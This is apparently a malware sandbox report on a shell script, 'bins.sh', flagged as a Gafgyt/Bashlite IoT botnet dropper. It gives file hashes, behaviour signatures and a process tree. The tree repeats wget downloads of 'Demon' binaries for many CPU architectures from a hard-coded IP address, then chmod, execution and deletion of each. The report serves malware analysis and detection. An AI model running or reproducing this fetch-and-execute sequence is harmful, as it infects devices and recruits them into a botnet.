Analysis
-
max time kernel
8s -
max time network
10s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
-
submitted
19-10-2024 11:41
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Score
10/10
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Changes its process name 3 IoCs
-
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
/usr/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.mpsl./Demon.mpsl2⤵
-
/usr/bin/rmrm -rf Demon.mpsl2⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
-
/tmp/Demon.sh4./Demon.sh42⤵
-
/usr/bin/rmrm -rf Demon.sh42⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
-
/tmp/Demon.x86./Demon.x862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
-
/usr/bin/rmrm -rf Demon.x862⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
-
/tmp/Demon.arm6./Demon.arm62⤵
-
/usr/bin/rmrm -rf Demon.arm62⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
-
/tmp/Demon.i686./Demon.i6862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
-
/usr/bin/rmrm -rf Demon.i6862⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.ppc./Demon.ppc2⤵
-
/usr/bin/rmrm -rf Demon.ppc2⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
-
/tmp/Demon.i586./Demon.i5862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
-
/usr/bin/rmrm -rf Demon.i5862⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.m68k./Demon.m68k2⤵
-
/usr/bin/rmrm -rf Demon.m68k2⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.sparc./Demon.sparc2⤵
-
/usr/bin/rmrm -rf Demon.sparc2⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
-
/tmp/Demon.arm4./Demon.arm42⤵
-
/usr/bin/rmrm -rf Demon.arm42⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
-
/tmp/Demon.arm5./Demon.arm52⤵
-
/usr/bin/rmrm -rf Demon.arm52⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵
- Writes file to tmp directory
-
/usr/bin/chmodchmod +x Demon.arm72⤵
- File and Directory Permissions Modification
-
/tmp/Demon.arm7./Demon.arm72⤵
-
/usr/bin/rmrm -rf Demon.arm72⤵
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc440fp2⤵
-
/usr/bin/chmodchmod +x Demon.ppc440fp2⤵
- File and Directory Permissions Modification
-
/tmp/Demon.ppc440fp./Demon.ppc440fp2⤵
-
/usr/bin/rmrm -rf Demon.ppc440fp2⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab